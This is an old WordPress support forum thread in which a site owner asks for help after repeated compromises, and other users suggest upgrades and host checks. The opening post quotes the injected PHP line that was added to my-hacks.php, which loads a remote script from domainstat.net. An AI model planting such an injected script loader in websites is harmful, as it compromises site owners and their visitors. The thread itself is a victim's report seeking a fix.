WP Hacked Twice

  • orchidred

    (@orchidred)


    19 years ago

    My site has been hacked twice this month and I can’t figure out how. It begins with my-hacks.php, where WP tells me that there headers were already sent. Opening my-hacks reveals that this bit of code has somehow been added to the file:

    <? if (!defined(‘domainstat’)) { define(“domainstat”, “ok”); echo “<script language=’JavaScript’ type=’text/javascript’ src=’https://domainstat.net/stat.php’></script>&#8221;;}?>

    Deleting that bit of code causing all my plugin and admin.php files to stop working and stylsheet.css stops working. The last time this happened the hack got progressively worse, eventually changing all my post links to a new link that sent people to a hardcore porno video.

    How is this happening? Anyone know how I can prevent it? Fix it?? HELP!!

Viewing 15 replies - 1 through 15 (of 65 total)
  • moshu

    (@moshu)

    Upgrade?

    Thread Starter orchidred

    (@orchidred)

    I’m already using the most recent version of WP. Initially they hacked my personal blog at https://www.themutteringmuse.com so my host company moved me to a new server. But now they have hacked both my personal blog and my photoblog at theshapeoflight.com. I’m really at a loss here.

    Thread Starter orchidred

    (@orchidred)

    I’m already using the most recent version of WP. Initially they hacked my personal blog at https://www.themutteringmuse.com so my host company moved me to a new server. But now they have hacked both my personal blog and my photoblog at theshapeoflight.com. I’m really at a loss here.

    Cypher

    (@cypher)

    Some details, what version of WP, PHP and Apache? Ask your host about possible break-in’s. A lot of times, inappropriate security across users on a shared hosting can allow for such hacks.

    Regards

    moshu

    (@moshu)

    From your source code:
    <title>The Shape of Light</title>
    <meta name="generator" content="WordPress 1.5.1.2" />
    Not really “the most recent”…

    moshu

    (@moshu)

    From your source code:
    <title>The Shape of Light</title>
    <meta name="generator" content="WordPress 1.5.1.2" />
    Not really “the most recent”…

    Thread Starter orchidred

    (@orchidred)

    I’m running WP 1.5.2 Strayhorn. PHP version 4.4.1. Apache version 1.3.34 (Unix).

    The first time my site was hacked my host company thought that it was because I was using the CodeGRRL calender script, which was recently exploited by hackers. But then they moved me to a new server, we deleted ALL non WP files. We just got my sites back up and running last night and now they’ve been hacked again. ?? I’m tempted to just give up on my sites, I worked SO hard to get them back up and running. :sob:

    Thread Starter orchidred

    (@orchidred)

    Moshu, when I log into WP it tells me its WP 1.2.

    The header probably isn’t correct because I pasted it from an earlier template that was running on 1.5.1.2.

    moshu

    (@moshu)

    Wp 1.2? That’s even worse. The latest stable is 1.5.3

    Thread Starter orchidred

    (@orchidred)

    Moshu: Sorry, I meant WP 1.5.2 Strayhorn. I’m really flustered right now.

    I’m running WP 1.5.2 Strayhorn. PHP version 4.4.1. Apache version 1.3.34 (Unix).

    moshu

    (@moshu)

    And I have to apologize, too.
    The latest is 1.5.2. Sorry.

    orlo

    (@orlo)

    this seems indeed a little bit worrying. Since reading these posts I got confused abiout which version you exactly use. Probably it’s best to first check your xmlrpc.php file.
    Just in case (it’s still form the old version)

    For the jvascript included there seems to be a quick work around… but we need to find the whole/problem they are using…

    Thread Starter orchidred

    (@orchidred)

    Orlo, the info I posted is correct, its WP 1.5.2 Strayhorn. I just made a mistake when responded to Moshu because I was really upset as I was typing.

    Well, even if I delete the javascript (which I did on one site) all the WP files themselves are now having problems. I tried replacing them with new ones by reuploading WP, but that didnt fix the problem.

    For example, one error I’m getting is:

    Warning: Cannot modify header information – headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 10

    Warning: Cannot modify header information – headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 11

    Warning: Cannot modify header information – headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 12

    Warning: Cannot modify header information – headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 13

    And I just replaced this file.

    Thread Starter orchidred

    (@orchidred)

    Also, I should note that deactivating plugins doesn’t change anything, it just causes new errors with other files.

    orlo

    (@orlo)

    I’ll try to get in touch with you via email. Although I think if you are really using the latest version- there might be a bigger problem. A quick search on google revealed that more people are having a similar problem. Found a wordpress 1.2.2 (see report here:
    https://board.thefanlistings.org/index.php?showtopic=47631)
    anothe report here: https://forum.powweb.com/showthread.php?p=345602 and
    someone on: PostNuke 0.7.6.1

Viewing 15 replies - 1 through 15 (of 65 total)
  • The topic ‘WP Hacked Twice’ is closed to new replies.